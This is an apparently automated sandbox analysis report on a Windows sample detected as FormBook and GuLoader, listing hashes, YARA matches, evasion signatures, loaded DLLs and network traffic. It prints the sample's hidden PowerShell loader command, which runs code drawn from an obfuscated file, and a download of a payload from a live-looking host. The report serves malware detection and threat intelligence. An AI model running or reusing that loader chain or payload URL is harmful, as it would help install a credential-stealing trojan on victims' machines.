Windows Analysis Report
PO Tournefortian2453525525235235623425523235.exe

Overview

General Information

Sample name:	PO Tournefortian2453525525235235623425523235.exe
Analysis ID:	1483268
MD5:	d332bcaa3c61494b774f49bf3e716c21
SHA1:	8cdfa60c6b3f25c7d48753e50c298b746c3386de
SHA256:	d61208c85ce83c279dd87495f0dfc1cf5c345d2bf3a6e739279dcf188e19b21d
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Powershell drops PE file

Sample uses process hollowing technique

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: PO Tournefortian2453525525235235623425523235.exe

ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Uses 32bit PE files

Source: PO Tournefortian2453525525235235623425523235.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 185.90.59.130:443 -> 192.168.11.20:49778 version: TLS 1.2

Source: PO Tournefortian2453525525235235623425523235.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008B92000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: wntdll.pdbUGP source: Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Sammentrykket.exe, Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb0 source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb316567-2969588382-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,		0_2_00406850
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405C26

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /FPkXcnPDrjTal168.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: villa-ventura.comCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /FPkXcnPDrjTal168.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: villa-ventura.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: villa-ventura.com

Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: PO Tournefortian2453525525235235623425523235.exe, 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO Tournefortian2453525525235235623425523235.exe, 00000000.00000000.76378317578.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000626000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villa-ventura.com/
Source: Sammentrykket.exe, 00000004.00000003.77136726603.00000000048A7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.00000000048A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villa-ventura.com/FPkXcnPDrjTal168.bin
Source: Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villa-ventura.com/FPkXcnPDrjTal168.binwt?

Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown

HTTPS traffic detected: 185.90.59.130:443 -> 192.168.11.20:49778 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe

Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209634E0 NtCreateMutant,LdrInitializeThunk,	4_2_209634E0
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_20962B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_20962B90
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_20962BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_20962BC0
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_20962D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_20962D10

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe

Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040350A

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_033C8930	2_2_033C8930
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_033C8060	2_2_033C8060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_033C7D18	2_2_033C7D18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07A7BEFE	2_2_07A7BEFE
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209200A0	4_2_209200A0
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_2093B0D0	4_2_2093B0D0
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209E70F1	4_2_209E70F1
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209DE076	4_2_209DE076
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209351C0	4_2_209351C0
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_2094B1E0	4_2_2094B1E0
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_2091F113	4_2_2091F113
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209F010E	4_2_209F010E
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_209CD130	4_2_209CD130
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_2097717A	4_2_2097717A
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Code function: 4_2_2091D2EC	4_2_2091D2EC

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896

Uses 32bit PE files

Source: PO Tournefortian2453525525235235623425523235.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/17@1/1

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe

0_2_0040350A

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe

File created: C:\Users\user\AppData\Local\efterplaprernes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5076
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msi.dll	Jump to behavior
